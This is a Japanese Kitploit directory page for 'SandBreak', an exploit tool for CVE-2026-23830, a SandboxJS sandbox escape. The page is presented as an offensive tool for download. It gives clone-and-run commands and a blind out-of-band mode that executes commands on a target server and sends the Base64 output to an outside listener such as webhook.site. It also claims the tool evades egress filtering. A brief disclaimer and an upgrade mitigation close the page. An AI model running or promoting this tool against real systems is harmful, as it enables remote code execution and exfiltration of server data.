Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23830-SandBreak — CVE-2026-23830(SandboxJSエスケープ)用のエクスプロイトペイロードを生成・配信し、ブラインドOOB外部送信とローカルcalc PoCのモードを備えています。HTTP/HTTPSリスナーをサポートし、圧縮されたJavaScriptペイロードを生成します。 | Kitploit
ツール/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

CVE-2026-23830(SandboxJSエスケープ)用のエクスプロイトペイロードを生成・配信し、ブラインドOOB外部送信とローカルcalc PoCのモードを備えています。HTTP/HTTPSリスナーをサポートし、圧縮されたJavaScriptペイロードを生成します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
167ヶ月前未レビュー

SandBreak

CVE-2026-23830 エクスプロイト生成 & 自動Pwnツール

Go Version License Type

SandBreak は、SandboxJSエスケープ脆弱性(CVE-2026-23830) を悪用するために設計された、堅牢なGoベースのエクスプロイト生成ツールです。

このツールは、古いバージョンの sandboxjs における保護されていない AsyncFunction コンストラクタを悪用し、攻撃者がV8サンドボックス環境から脱出してホストシステム上で任意のコードを実行できるようにします。Blind OOB Exfiltration、Defacement、Error-Based RCE を含む複数のペイロードモードをサポートしています。


特徴

  • 2つの攻撃モード:
    • oob: ブラインドシナリオ向けのOut-of-Bandデータ流出(HTTP/HTTPS)。
    • calc: calc.exe を起動(クラシックなPoC)。
  • スマートOOB: サーバークラッシュを防ぐため、HTTPとHTTPSを自動検出。
  • Goベース: 単一バイナリで、攻撃者マシンに依存関係は不要。
  • 軽量: 純粋で最小化されたJavaScriptペイロードを生成。

インストール

リポジトリをクローンして実行します:

root@kitploit:~
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go

使用方法

root@kitploit:~
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]

1. OOBモード(ブラインドRCE - プロフェッショナル向け)

出力フィードバックがない場合に使用します。コマンドを実行し、Base64エンコードされた結果をリスナー(例: webhook.site)に送信します。

root@kitploit:~
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"

ネットワークエラーを処理することで、基本的なエグレスフィルタリングのクラッシュを正常に回避します。

2. Calcモード(ローカルテスト)

Windowsサーバー上で電卓を起動します。

root@kitploit:~
go run CVE-2026-23830.go -mode calc

概念実証(PoC)

シナリオ: OOB流出

サイト上に視覚的な出力がないにもかかわらず、攻撃者がWebhook経由でサーバーのユーザーデータを受信している様子。


免責事項

このツールは教育目的および許可されたペネトレーションテスト専用に作成されています。

  • 所有していない、または明示的なテスト許可がないシステムでこのツールを使用しないでください。
  • 作者は、このツールの誤用またはそれによって引き起こされた損害について一切の責任を負いません。

緩和策

AsyncFunction コンストラクタが適切にサンドボックス化された最新バージョンに sandboxjs をアップグレードしてください。

root@kitploit:~
npm update sandboxjs

作者: Meysam Bal-afkan

ライセンス: MIT

ツールをダウンロード